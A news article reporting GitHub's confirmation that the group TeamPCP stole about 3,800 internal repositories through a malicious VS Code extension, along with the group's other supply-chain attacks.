GitHub compromised through a malicious VS Code extension, resulting in the theft of 3,800 repositories.

      TL;DR: GitHub confirmed that the cybercriminal group TeamPCP extracted around 3,800 internal code repositories after infiltrating an employee's device via a harmful VS Code extension. Although the Microsoft-owned platform stated that no customer data was compromised, this breach underscores the increasing danger of supply chain attacks targeting developer tools.

      It is an ironic situation when the largest code-hosting platform falls victim to its ecosystem. On Tuesday, GitHub verified that a threat actor accessed nearly 3,800 internal repositories after taking over an employee’s device through a malicious Visual Studio Code extension, representing one of the most significant breaches ever reported by the Microsoft-owned company.

      TeamPCP, also known as UNC6780, took responsibility for the attack on the Breached hacking forum, where they offered the stolen data—described as proprietary source code and internal files—starting at a price of $50,000. They threatened to leak the data if no buyer came forward.

      GitHub's investigation revealed that the incident started when an employee downloaded a harmful extension from the official VS Code Marketplace. This one installation was sufficient for the attacker to access the employee's device and subsequently thousands of private repositories. GitHub noted that the attacker’s claim regarding the number of compromised repositories was “directionally consistent” with its findings.

      Upon discovering the breach, the company acted swiftly to isolate the affected device, remove the extension, and rotate important credentials within hours. GitHub emphasized that the breach involved only the exfiltration of internal repositories and no evidence showed any impact on customer data, enterprise accounts, or user-hosted repositories.

      Nonetheless, this incident serves as a stark reminder of how supply chain attacks focusing on developer tools can penetrate even the most security-aware organizations. TeamPCP has established a notable history in this area, having previously compromised Aqua Security’s Trivy vulnerability scanner, leading to the extraction of 92 GB of data from the European Commission’s AWS infrastructure. The group has also targeted Checkmarx’s KICS, the LiteLLM AI gateway library, the Telnyx SDK, TanStack, and packages linked to MistralAI.

      The VS Code Marketplace has emerged as a growing target for supply chain attacks. Unlike traditional package registries like npm or PyPI, browser and editor extensions often come with broad system permissions by default, making them particularly attractive to attackers seeking unauthorized access. GitHub has not disclosed the specific extension involved in this breach, and it remains unclear whether it was a newly launched malicious listing or a compromised legitimate tool.

      The timing is particularly concerning, as GitHub’s breach coincides with an uptick in software supply chain compromises affecting organizations across various sectors. The ShinyHunters group, which has previously worked with TeamPCP, recently leaked stolen data from the European Commission. OpenAI was targeted via a compromised TanStack package, and earlier this month, researchers identified hundreds of malicious npm packages from a campaign known as Mini Shai-Hulud linked to the same threat cluster.

      For GitHub, which supports more than 100 million developers and serves as crucial infrastructure for the global software industry, this breach raises challenging questions regarding the security of the tools developers rely on. If a platform based on code review and version control can be breached through a rogue extension, the implications for less secure organizations are troubling.

      GitHub stated that its investigation is ongoing, with external forensic support engaged to determine the full extent of the data accessed. The company shared information about the incident on X, reaffirming that customer data remained unaffected.

      Meanwhile, TeamPCP shows no indication of slowing down. From EU institutions to AI infrastructure to the very foundation of open-source development, the group consistently employs the same strategy: compromise the tools that organizations depend upon, rendering traditional security perimeters meaningless.